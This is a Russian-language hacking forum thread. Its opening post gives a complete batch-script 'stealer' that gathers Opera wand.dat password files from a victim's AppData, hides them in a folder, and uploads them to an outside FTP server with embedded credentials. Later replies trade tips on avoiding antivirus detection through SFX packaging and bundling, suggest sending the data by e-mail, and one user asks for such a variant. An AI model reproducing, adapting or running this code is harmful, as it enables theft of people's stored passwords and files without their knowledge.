Последнее время появилось много "приватных" стилеров, которые способны тянуть файлы с компа жертвы по маске и заливать их на ftp. Стоят такие двух-трех мегабайтные "монстры" на Делфи около $40. Неудевительно, ведь они не палятся

И вот я решил написать своего такого зверя, но не для того, что бы продавать, а показать, насколько это элементарно.

И так вот говнокодец на батче:


Code:
@echo off
prompt $$$g
::настройки
set ans=%temp%\ans
::файл ответов
set login=login
set pwd=pass
::логин-пасс
set dir=%date%_%time%
set ld=%systemdrive%\files
::директории
set pth=%appdata%
set mask=wand.dat
::маска для поиска

echo open ftp.nextmail.ru > %ans%
echo user %login%>> %ans%
echo %pwd%>> %ans%
::логинимя на ftp
echo mkdir %dir% >> %ans%
echo cd %dir% >> %ans%
echo binary >> %ans%
::готовимся передавать файлы

mkdir %ld%
attrib +h %ld%
::виндовый ftp не умеет работать с путями с русскими символами

::forfiles /p %pth% /s /m %mask% /c "cmd /c copy @path %ld%"
for /r "%pth%" %%d in (%mask%) do copy %%d %ld%>nul
::forfiles /p %ld% /s /m * /c "cmd /c echo put @path >> %ans%"
for /r %ld% %%d in (*) do echo put %%d >> %ans%

echo quit >> %ans%

ftp -v -n -s:%ans%
del /q /f %ans%
::del /q /f %0
rmdir /s /q %ld%
pause

Так что, все очень элементарно и просто, да и коментов полно.

Елинственное, замечу, что forfiles, наверно, более элегантен, чем for, но появился только в 2003, так что не так универсален. Что использовать, решать Вам .

А я прошу коментировать мою статью, уточнять и дополнять ее. Спасибо за внимание.

Минус в том что Защитник windows будет писать что обнаружен консольный FTP и предложить удалить его.

Лучше использовать консольный e-mail

+ Автор молодец - материал забавен

- Сейчас все пытаються написать чегото на батах в доказательство их хэккерского естества

А вообще советую автору приглядеться к развитой системе скриптинга в виндосе даже из коробки - MonadShell, WindowsScripringHost.

D4rkC10ud said:
+ Автор молодец - материал забавен
- Сейчас все пытаються написать чегото на батах в доказательство их хэккерского естества
А вообще советую автору приглядеться к развитой системе скриптинга в виндосе даже из коробки - MonadShell, WindowsScripringHost.


Батч просто очень хорошо подходит для манипуляций с файлами, не больше, не меньше. С WSH знаком хорошо, MonadShell нужно заведомо поставить на комп жертвы, а значит он не подходит.

j0sur,

юзал Pinch?

там всё - кодер The Bat (той самой мейл проги) написал, на Си.

сурсы проги есть.

altblitz said:
j0sur
,
юзал Pinch?
там всё - кодер The Bat (той самой мейл проги) написал, на Си.
сурсы проги есть.


Есть люди, которые любят использовать свои велосипеды

Вставлю и я свои 5 копеек.

1)На сколько я понял определить диски в системе бат не может,значит он не сможет искать файлы на всех дисках.

2)Если нужно подсунуть этот файл жертве,то его надо компилить,если его скомпилить он будет палиться.

По этому все это пишется на нормальных ЯП и стоит соответственно.

j0sur said:
двух-трех мегабайтные "монстры" на Делфи


Стиллер? 2-3 Мб? Руки = false...

DooD said:
Вставлю и я свои 5 копеек.
1)На сколько я понял определить диски в системе бат не может,значит он не сможет искать файлы на всех дисках.
2)Если нужно подсунуть этот файл жертве,то его надо компилить,если его скомпилить он будет палиться.
По этому все это пишется на нормальных ЯП и стоит соответственно.


1) можно(просто весьма муторно), на vbs все это реализуется в 5-10 кб(на харде валяется такой, правда ищет в списке папок, но вместо него генерить список дисков -- 15-20 строк)

2) sfx можно собрать, 100% палится не будет, но и размер порядка 150-200 кб будет, хотя если лепить с чем-то больше 1мб, то врядли кто-то заметит.

В целом, (недо)статья писалась что бы показать насколько это элементарно.


shadowrun said:
Стиллер? 2-3 Мб? Руки = false...


Скорей всего из-за использованния стандартных дельфовых компонентов. Там реально не может быть столько кода.

j0sur said:
Скорей всего из-за использованния стандартных дельфовых компонентов. Там реально не может быть столько кода.


Тогда давай не будем вводить пользователей в заблуждение. 2 года назад писал подобное. Быдлокодом + использовал инди и результат вышел около 250 кб. А если юзать сокеты и винапи?

shadowrun said:
Тогда давай не будем вводить пользователей в заблуждение. 2 года назад писал подобное. Быдлокодом + использовал инди и результат вышел около 250 кб. А если юзать сокеты и винапи?


Я не спорю, что на Делфи можно написать стилер меньше 50кб, но тут нужно лезть в низкоуровневые дебри. И многим просто лень, либо не охота учиться, все равно найдется тот, кто будет это чудо лепить с 50-ти метровой инсталяхой, а ему глубоко всеравно на те 2мб.

Monad(Power)Shell идет в стандартной поставке винды начиная с Vista

И таки да, не так плох и страшен Delphi, как его одэпты.

А можно ли сделать такой же стилер на bat только чтоб не по ftp отправлял а на имейл, или сохранял в логах на компе жертвы по указаному пути? Если кто может сделать буду очень благодарен.

shadowrun said:
Стиллер? 2-3 Мб? Руки = false...


ога, макс 10-20 Кб и то если это полноценный RAT будет